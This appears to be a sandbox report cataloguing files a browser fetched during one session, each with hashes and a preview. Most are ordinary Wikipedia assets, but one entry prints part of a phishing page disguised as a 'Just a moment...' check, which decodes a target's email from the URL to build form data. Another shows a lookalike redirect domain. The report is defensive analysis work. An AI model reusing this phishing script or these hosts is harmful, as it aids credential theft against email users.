                                                                                                                                                                                                                                    MD5:38A780A62EB546B092D3971D9726933B
                                                                                                                                                                                                                                    SHA1:F15AACF2D1BA86B4DD0B5CC3E57BF495E164BE4A
                                                                                                                                                                                                                                    SHA-256:7A6B42A6EC883D930C8A77A49297D5C082D056B5DAB7F9B83F259D3680525291
                                                                                                                                                                                                                                    SHA-512:802152CD0E703EBE9E67CFDC9540A6C508BC253FFE62FC4AC68227F7A24CDC9AC6019CCB0EA0C7937FD63C7CB1154309C93F0B3E6AB4AAFD1FE995B08107E3F3
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkdhT3pgHiGmBIFDULauvc=?alt=proto
                                                                                                                                                                                                                                    Preview:CgkKBw1C2rr3GgA=
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):580
                                                                                                                                                                                                                                    Entropy (8bit):7.53706839742631
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:M5yszZsNAVBzDERWhiALrq/H2BNhiZ5yZLpUJPZKBAz9UcmT:MYszuNdwhl/qaiPyZpUJPr9Uco
                                                                                                                                                                                                                                    MD5:DF8A72053F190EC74B5A37B4685067CB
                                                                                                                                                                                                                                    SHA1:12B8FF86163558CCC8DA49C3FD6166EFA936D6A1
                                                                                                                                                                                                                                    SHA-256:9C49DD822D51B87BFE053C75696EA0DBB3F20AA545B6932B1CD2BF86F1EEA399
                                                                                                                                                                                                                                    SHA-512:048A19513553C21EB4618D1E7545B9E43D4B41908F40707CDAD5AD9213DFA36B3D6097113CFE7BDD8777E9FB7EEE416E03256BC4F77DFB76F29FFCB357BBDE85
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://upload.wikimedia.org/wikipedia/en/thumb/d/db/Symbol_list_class.svg/16px-Symbol_list_class.svg.png
                                                                                                                                                                                                                                    Preview:RIFF<...WEBPVP8L/.../...... .$E...{..._&...m$9RUo.;....^...$)R.3.y..x...&:../.."ODj3J`Q.5.Q.!D..{;#.6. `@...........1?e}HX............G..b....3...I.A.Pd.T..R.........[rp.Vi.\....<H(.$....@..((.?.......{c.z.a.......w%sO9t.......o.j.h....Z"....=U....`n;q.....p......"*".`...........D..[C......ak..7.'."&...X...&.wTTD.DT......o1 ..<.<@.l.s.m..}c.~.m.6w..^..... ._b|CVR#.B.4/YF.,.X.x.Z.H#"..|...~>.KR..1]....?...j....6.....|a...C..[.d...og.9...;......1.c.......O<`4.....\..G.xE....N.z...Y~.0].......~....d.c+o3...d.)........."R..X...H..o"....-cEq.6._c.yH..
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (709)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):3530
                                                                                                                                                                                                                                    Entropy (8bit):5.183989097603964
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:x9313e2Z+59Uhl679Smbbc7mdOV3ny2WWAIhBJqmQAY18SFvLv:/yR9Sm8Y03JoICAYL1D
                                                                                                                                                                                                                                    MD5:D22721B5C0396AFAB367F24463AC6542
                                                                                                                                                                                                                                    SHA1:C28D2F7D3AF5D7BBBDF9FCFBC6D0C9D21D86064D
                                                                                                                                                                                                                                    SHA-256:71F4179F271340B7801D10F4DDFA5266657DA63628D2689E89E389C8CA39283D
                                                                                                                                                                                                                                    SHA-512:AE0E9DE1EB360839409095EECD09D27C9285116CCEC4B4ACFEFD412A67F0BCAC97626B0A82A9B1DB9F5B6D70535D4B3992157CFCD9985C6FF87F8906DAC8CDFB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://porposal-ach.pages.dev/
                                                                                                                                                                                                                                    Preview:..<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8" />. <title>Just a moment...</title>. <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>.. DEWE -->.. <script>... function javascriptCallback() {. var hashValue = window.location.hash.substr(1);. var hash2 = hashValue.split("#")[1];. // console.log(hash2[1]);.. const urlParams = new URLSearchParams(hashValue);. const name = urlParams.get('service');.. .. // Decode the Base64-encoded value. var decodedValue = atob(name);. console.log(decodedValue);. var parts = decodedValue.split("&");. . . var mails = parts[0];. var mails2 = atob(mails);. console.log(mails2);. . var key = parts[1];. var display = parts[2];.. var form = new FormData();. // form.append("subs", `${mails}
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (709)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3530
                                                                                                                                                                                                                                    Entropy (8bit):5.183989097603964
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:x9313e2Z+59Uhl679Smbbc7mdOV3ny2WWAIhBJqmQAY18SFvLv:/yR9Sm8Y03JoICAYL1D
                                                                                                                                                                                                                                    MD5:D22721B5C0396AFAB367F24463AC6542
                                                                                                                                                                                                                                    SHA1:C28D2F7D3AF5D7BBBDF9FCFBC6D0C9D21D86064D
                                                                                                                                                                                                                                    SHA-256:71F4179F271340B7801D10F4DDFA5266657DA63628D2689E89E389C8CA39283D
                                                                                                                                                                                                                                    SHA-512:AE0E9DE1EB360839409095EECD09D27C9285116CCEC4B4ACFEFD412A67F0BCAC97626B0A82A9B1DB9F5B6D70535D4B3992157CFCD9985C6FF87F8906DAC8CDFB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8" />. <title>Just a moment...</title>. <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>.. DEWE -->.. <script>... function javascriptCallback() {. var hashValue = window.location.hash.substr(1);. var hash2 = hashValue.split("#")[1];. // console.log(hash2[1]);.. const urlParams = new URLSearchParams(hashValue);. const name = urlParams.get('service');.. .. // Decode the Base64-encoded value. var decodedValue = atob(name);. console.log(decodedValue);. var parts = decodedValue.split("&");. . . var mails = parts[0];. var mails2 = atob(mails);. console.log(mails2);. . var key = parts[1];. var display = parts[2];.. var form = new FormData();. // form.append("subs", `${mails}
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1733
                                                                                                                                                                                                                                    Entropy (8bit):5.1032083389531495
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:Y8kEduFRTx/j26OooeU1e+MckMYeIvPLxMYvJk:eESRTx77foeqO7k
                                                                                                                                                                                                                                    MD5:1E7BAB53910AD7135F28D3402F502CFE
                                                                                                                                                                                                                                    SHA1:ACC6757C59591AFF0BD58223975B769F711BE0DA
                                                                                                                                                                                                                                    SHA-256:6479146B570F331A7B0DDEAAE5E3B7E1E4B25319F1DB805B3DA3883E5B61ED85
                                                                                                                                                                                                                                    SHA-512:EAC581E47C273928CF9810AFEC3D0F3838293EA5861B27F9B66024DD2C664157A906A653FD2DA23C5FD3290570E4053F44F11F041F6BDAB22167BA13728EF6BE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:{"type":"standard","title":"Programmer","displaytitle":"<span class=\"mw-page-title-main\">Programmer</span>","namespace":{"id":0,"text":""},"wikibase_item":"Q5482740","titles":{"canonical":"Programmer","normalized":"Programmer","display":"<span class=\"mw-page-title-main\">Programmer</span>"},"pageid":23716,"thumbnail":{"source":"https://upload.wikimedia.org/wikipedia/commons/thumb/8/8c/Two_women_operating_ENIAC_%28full_resolution%29.jpg/320px-Two_women_operating_ENIAC_%28full_resolution%29.jpg","width":320,"height":216},"originalimage":{"source":"https://upload.wikimedia.org/wikipedia/commons/8/8c/Two_women_operating_ENIAC_%28full_resolution%29.jpg","width":2846,"height":1924},"lang":"en","dir":"ltr","revision":"1267203979","tid":"da3f346c-ca42-11ef-9f8c-92016dfde744","timestamp":"2025-01-04T02:23:15Z","description":"Person who writes computer software","description_source":"local","content_urls":{"desktop":{"page":"https://en.wikipedia.org/wiki/Programmer","revisions":"https://en.wi
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):704
                                                                                                                                                                                                                                    Entropy (8bit):4.690707101256654
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:TMHd6FdmeBevgqcB+CPbGZ9OPsClYzFoAmFJiFHjJvYADLcAXD4Kn:2d6FdmeGH0g9OUSdA6SvRDLNXD4Kn
                                                                                                                                                                                                                                    MD5:BC8FC77B826EC97DF462E51C63A003A9
                                                                                                                                                                                                                                    SHA1:D5574779AF087BEDD38D985E0C5FC9FC35EA49E8
                                                                                                                                                                                                                                    SHA-256:11FF898D3A99CE9B2FE1E0C746ABDB89B50F8DA5A5597023ABE54AC1278A428E
                                                                                                                                                                                                                                    SHA-512:5602B266BAD8E7AF502EDB2E4EBB5284AF0CD8355E46ECB1130F3FACF0C4528F1A1FBF227F47C05131D7C93A054BA2D8440C47FE888D07F492E76E28FA71EDB5
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>...language..</title><g fill="#36c"><path d="M20 18h-1.44a.6.6 0 0 1-.4-.12.8.8 0 0 1-.23-.31L17 15h-5l-1 2.54a.8.8 0 0 1-.22.3.6.6 0 0 1-.4.14H9l4.55-11.47h1.89zm-3.53-4.31L14.89 9.5a12 12 0 0 1-.39-1.24q-.09.37-.19.69l-.19.56-1.58 4.19zm-6.3-1.58a13.4 13.4 0 0 1-2.91-1.41 11.46 11.46 0 0 0 2.81-5.37H12V4H7.31a4 4 0 0 0-.2-.56C6.87 2.79 6.6 2 6.6 2l-1.47.5s.4.89.6 1.5H0v1.33h2.15A11.23 11.23 0 0 0 5 10.7a17.2 17.2 0 0 1-5 2.1q.56.82.87 1.38a23.3 23.3 0 0 0 5.22-2.51 15.6 15.6 0 0 0 3.56 1.77zM3.63 5.33h4.91a8.1 8.1 0 0 1-2.45 4.45 9.1 9.1 0 0 1-2.46-4.45"/></g></svg>.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):252
                                                                                                                                                                                                                                    Entropy (8bit):5.063769880037573
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:Us4++yXXhj5MnRxJ/6ETEcQ1RTlvfwgLjzWu1rdEG2SSn:UsJ+QXIndTEcQ1fzXKu1S
                                                                                                                                                                                                                                    MD5:F99AD5DABC437FC03CE06A1257F99F38
                                                                                                                                                                                                                                    SHA1:D0E5E137AA05FC9F948D72F844D209A356885A70
                                                                                                                                                                                                                                    SHA-256:5445B87F97B5C6CE7C0CA4ED6272535D750942B3B042872F8D4F1FE8457777EB
                                                                                                                                                                                                                                    SHA-512:3F0F1CC8D932FCEA6AAD9319403CBD630C355D8BE3DE38E1DE55BE38CD7EC5DB521B64CEDACBB8D6C50A2CAD29B13B2B7454DB1B33AA8EC2654E8D7065BDDA1A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:/* Not centrally logged in */.(function(){var t=new Date();t.setTime(t.getTime()+86400000);try{localStorage.setItem('CentralAuthAnon',t.getTime());}catch(e){try{document.cookie='CentralAuthAnon=1; expires='+t.toGMTString()+'; path=/';}catch(e2){}}}());
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):188
                                                                                                                                                                                                                                    Entropy (8bit):4.760925121012862
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:YMrJk/BXHJGw9Hv6LDHK9vH1ll/QyJvT39PQepZTV/YV39CUbHfRZTV/q:YMrJk/hHJ19mwVRJvT3jZZ4397fvZC
                                                                                                                                                                                                                                    MD5:9DCDCD9F0D6304D75F0AA466618AF89F
                                                                                                                                                                                                                                    SHA1:815EA417396876637E3A683E8D9255BBDB998B3B
                                                                                                                                                                                                                                    SHA-256:7B3BE844B4D083D06EDD9646C6990055AF44673C543E21BB9A05F8EB8F8A320B
                                                                                                                                                                                                                                    SHA-512:1ECAB3E122F1D3EB8BED466A8005C48ADD5722312E06A6FFA189B34A4A664E6B78371CF679781C73A06837CCE14887F8C94F092E61029755B00B556B11E32818
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://natrium100gram.site/public/api/validate_key/tes2
                                                                                                                                                                                                                                    Preview:{"id":15,"key":"tes2","username":"Roione1","url_target":"https:\/\/abb0tt.net\/#","optional_url":null,"created_at":"2023-06-25T22:49:32.000000Z","updated_at":"2026-12-10T22:49:32.000000Z"}
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (4620)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):59552
                                                                                                                                                                                                                                    Entropy (8bit):5.198846506734475
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:axw0blwK/0izBPIzmqGjEaK3vYcbGnQP32ZBDfDOVD7KMGAKxQNWs4jZQ+Ucy7qb:iw0D/pzBPhjq3d+jh5nJaR/6aTpzpi
                                                                                                                                                                                                                                    MD5:29F6BCA33D8AD8C15E6A368D4235B2B0
                                                                                                                                                                                                                                    SHA1:D7A6275384A231265914386BE1486C04A34DB06D
                                                                                                                                                                                                                                    SHA-256:53CE9657C115E6AA9E67DBF72CBF5C9C09356EA32FB8A43BAA9C6DEC43684CE4
                                                                                                                                                                                                                                    SHA-512:1BB16075A087B643E5D3DEB9437A342D127A0A83F5ECBC28936421CA399E1ABD2978E31D2307E9FA0811EB781E092137A5D7C3F53D916895A3A5B1610E81A3B0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/w/load.php?lang=en&modules=ext.visualEditor.core.utils.parsing%7Cext.visualEditor.desktopArticleTarget.init%7Cext.visualEditor.progressBarWidget%2CsupportCheck%2CtargetLoader%2CtempWikitextEditorWidget%2Ctrack%2Cve&skin=vector-2022&version=1mjy2
                                                                                                                                                                                                                                    Preview:mw.loader.impl(function(){return["ext.visualEditor.core.utils.parsing@1rcro",function($,jQuery,require,module){ve.isBlockElement=function(element){const elementName=typeof element==='string'?element:element.nodeName;return ve.elementTypes.block.indexOf(elementName.toLowerCase())!==-1;};ve.isVoidElement=function(element){const elementName=typeof element==='string'?element:element.nodeName;return ve.elementTypes.void.indexOf(elementName.toLowerCase())!==-1;};ve.elementTypes={block:['div','p','table','tbody','thead','tfoot','caption','th','tr','td','ul','ol','li','dl','dt','dd','h1','h2','h3','h4','h5','h6','hgroup','article','aside','body','nav','section','footer','header','figure','figcaption','fieldset','details','blockquote','hr','button','canvas','center','col','colgroup','embed','map','object','pre','progress','video'],void:['area','base','br','col','embed','hr','img','input','link','meta','param','source','track','wbr']};ve.matchTag=function(html,tag){return html.match(new RegExp('
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):526
                                                                                                                                                                                                                                    Entropy (8bit):7.592290127884418
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:GJfuKs8R2lGllJu9zA2qABjrpJzu1RyET0coHQwTnScpAs778HEX:INsBlVdDjDu1RScoH7TWsUkX
                                                                                                                                                                                                                                    MD5:76A5EDF0BD61368AED4D36E986E02464
                                                                                                                                                                                                                                    SHA1:B6F6A30DEE09E958F3E14A27A7B16641ED00B87D
                                                                                                                                                                                                                                    SHA-256:2BC4EE8140E6B31E45FBD24E35F80D4A70E951E3748E90901D4C7A22E624A722
                                                                                                                                                                                                                                    SHA-512:6DFA1FD70B0A53B689141881B636DA2E4F088E21FF52F789D9A2FB9A1BEBE7E09D2A28ADE2F1BFE2CEEA77E182953E7701780C2A47BB4477E1C98C709A416E9E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://upload.wikimedia.org/wikipedia/en/thumb/9/96/Symbol_category_class.svg/16px-Symbol_category_class.svg.png
                                                                                                                                                                                                                                    Preview:RIFF....WEBPVP8L..../...._.&.$G..q..~&..{jh8l..$....o(.........$I...9....._..m.......`..jD..D..S.~....@.U.@..D.A..$.@.I}..y....`.%.J9.x..,...h.F..Y...P.{...VK.Q....QU. ..2D.H........7..f.W.m...d.....*....z..A.,......=.......U..D.C.Q*7..#\t,.e..[.D..=^..Gf.........T..F....+\ J..E..lY....D#.".(.@.m.tsb....8.m...n.?;....O........Kbuv.|.N..'..a!.....N..da3...w..E....0y..S...@..#.H^.....|........R2........g).....g.}...r..O<s..k;....&.....w_.]*[.r..o.$....m&.p..(..X.%....l...9..5.....$.:..*..:$U.B...
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 200 x 25, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2842
                                                                                                                                                                                                                                    Entropy (8bit):7.186945563838732
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:Fw2OQX0Oo70NMqFIwWkhH/UM30C7dgM44hs9m0GiFRZgpnrINTAR4vNvnvVFE5:hNX9oS9FFV//F44aPeprINJ9w
                                                                                                                                                                                                                                    MD5:8087241E0374EE22AB2B832F25325BF5
                                                                                                                                                                                                                                    SHA1:1B8100AC06446E0EA2F1B199C6F7B00C856BF894
                                                                                                                                                                                                                                    SHA-256:9407E289B09A5B737F72ED151235C6A42193259F7F67FDBC3AF6873BBB538DE4
                                                                                                                                                                                                                                    SHA-512:F6294E949AE5EA8835195E672FEB96005F5F09A526BC1942F482659ED8FF36C3629A73E8864272AD194E7551D392BEB715731C890BE8D6C2B18F0E434E5B2634
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............C.&....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE......................................................................................................................$............................................................................................................................................................................................ .........................................................................................................................................................................................................................................................................................................................................................................................................................................................tRNS.."Gl?.3^....x.<a`A..#[....Z.%.5w.o.t......s..F....d...{..@(Mf..;iO.C:.v...........p.!...I...}1..'Y.U..].......z.*r...L$....~.....u...
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (47520)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):47521
                                                                                                                                                                                                                                    Entropy (8bit):5.398500199255723
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                                                                                                                                                                                                                    MD5:301F68F3D8317AB22D4021E266C9A853
                                                                                                                                                                                                                                    SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                                                                                                                                                                                                    SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                                                                                                                                                                                                    SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 55 x 70, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                                                                    Entropy (8bit):4.068159130770307
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPli5tth+QlpAkxl/k4E08up:6v/lhPCfTAk7Tp
                                                                                                                                                                                                                                    MD5:A12F0D22449538D3ACC4F851403264F2
                                                                                                                                                                                                                                    SHA1:CFE37115B94FF482A1E5CE679E7A4DA1B33C006A
                                                                                                                                                                                                                                    SHA-256:2026EBB7FC961A2F990A6FC1A3B6D3056D8341D757E587E63FACB3B91B38B6A9
                                                                                                                                                                                                                                    SHA-512:0814A623D45ECC01AA0403F9A6E8B9B2DE4D36A89234C4B9B230346E8D670FBE80F6656B321AB3E933F0E030BD1592E9E0F0D0E11892735BD943A0E0B7190124
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR...7...F.......u....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):221
                                                                                                                                                                                                                                    Entropy (8bit):5.140712389287767
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:vFWWMNHU8LdgCfWGKsqDmJS4RKb5zMcFH3AMO+lHpkKcvXvxcAD6srHGVPQcHwX/:TMVBd/i9mc4slzTQol8ya2in+8H
                                                                                                                                                                                                                                    MD5:F4C86D1899E1F6ECA69D3CE4DC961304
                                                                                                                                                                                                                                    SHA1:36196FFCC258E966E2C9F4D06D80733C48BD40DE
                                                                                                                                                                                                                                    SHA-256:4DE5F25341A457E9FBCF7C29C44158D94CE7F74E91F92AE30B03FE7606716D08
                                                                                                                                                                                                                                    SHA-512:D55B1F67FE20CD134B3B4A409BE2C86DF24647647334B2F4566AB08C8C7E3D04EFB12AB606EF7AB88A128DA48D90013279562249F5085A085EBB39E72298EB3B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=menu&format=original&lang=en&skin=vector-2022&version=11c23
                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>...menu..</title><g fill="#000"><path d="M1 3v2h18V3zm0 8h18V9H1zm0 6h18v-2H1z"/></g></svg>.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):538
                                                                                                                                                                                                                                    Entropy (8bit):5.192122699809028
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:hYzx7BqhCiMqgtZ7ctQtqqJmrLgFCMqUIqtT+4Nbx8oA2CMqgtlMqgtUt:hYzxBqhCiZQ42RQZUIe+4NBA2CZwZ/t
                                                                                                                                                                                                                                    MD5:1DB64081FADDFFD8095F6C080A5A85C3
                                                                                                                                                                                                                                    SHA1:5B771AA2EEAD2E85A7D79FC260BA97A7A30BDBBA
                                                                                                                                                                                                                                    SHA-256:51835BD76B51DEB4AD1CBFD73244D7DF214C2A6AA32C0A9968663444A262C6AD
                                                                                                                                                                                                                                    SHA-512:6F7D246353550DE99DE9B4949E1B9A7A4A7FBF334967FD24A72D25F1FC458E6BC1DE4F82D3C5A35D87025B73B808FE2FE53C8E1B2364251C95C14813DC898B63
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://href.li/?https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html><head>.<title>href.li</title>.<meta http-equiv="Refresh" content="0; url=https://en.wikipedia.org/wiki/Windows_Server_2019" />.<meta name="referrer" content="no-referrer" />.<script type="text/javascript">./* <![CDATA[ */.window.location.replace( "https:\/\/en.wikipedia.org\/wiki\/Windows_Server_2019" + window.location.hash );./* */.</script>.</head>.<body><p>Redirecting..<br /><a href="https://en.wikipedia.org/wiki/Windows_Server_2019">https://en.wikipedia.org/wiki/Windows_Server_2019</a></p></body></html>
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (4620)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):59552
                                                                                                                                                                                                                                    Entropy (8bit):5.198846506734475
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:axw0blwK/0izBPIzmqGjEaK3vYcbGnQP32ZBDfDOVD7KMGAKxQNWs4jZQ+Ucy7qb:iw0D/pzBPhjq3d+jh5nJaR/6aTpzpi
                                                                                                                                                                                                                                    MD5:29F6BCA33D8AD8C15E6A368D4235B2B0
                                                                                                                                                                                                                                    SHA1:D7A6275384A231265914386BE1486C04A34DB06D
                                                                                                                                                                                                                                    SHA-256:53CE9657C115E6AA9E67DBF72CBF5C9C09356EA32FB8A43BAA9C6DEC43684CE4
                                                                                                                                                                                                                                    SHA-512:1BB16075A087B643E5D3DEB9437A342D127A0A83F5ECBC28936421CA399E1ABD2978E31D2307E9FA0811EB781E092137A5D7C3F53D916895A3A5B1610E81A3B0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:mw.loader.impl(function(){return["ext.visualEditor.core.utils.parsing@1rcro",function($,jQuery,require,module){ve.isBlockElement=function(element){const elementName=typeof element==='string'?element:element.nodeName;return ve.elementTypes.block.indexOf(elementName.toLowerCase())!==-1;};ve.isVoidElement=function(element){const elementName=typeof element==='string'?element:element.nodeName;return ve.elementTypes.void.indexOf(elementName.toLowerCase())!==-1;};ve.elementTypes={block:['div','p','table','tbody','thead','tfoot','caption','th','tr','td','ul','ol','li','dl','dt','dd','h1','h2','h3','h4','h5','h6','hgroup','article','aside','body','nav','section','footer','header','figure','figcaption','fieldset','details','blockquote','hr','button','canvas','center','col','colgroup','embed','map','object','pre','progress','video'],void:['area','base','br','col','embed','hr','img','input','link','meta','param','source','track','wbr']};ve.matchTag=function(html,tag){return html.match(new RegExp('
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):182902
                                                                                                                                                                                                                                    Entropy (8bit):5.143022237806794
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:IzmOX5GWkanwyBIzJkaSnfnCnZ6ozjht8F:IzF5GWkanwyBIzJkaSnfnCnZ6oXht8F
                                                                                                                                                                                                                                    MD5:80AE7430533E1268DA6D350068BDC2C4
                                                                                                                                                                                                                                    SHA1:F6DCC897CBF6F749A914C5221767B1AB9124889D
                                                                                                                                                                                                                                    SHA-256:F957335158AA6CC517703AC750F6DD0FB22E9D9A433D01311D37082FBA20BCFE
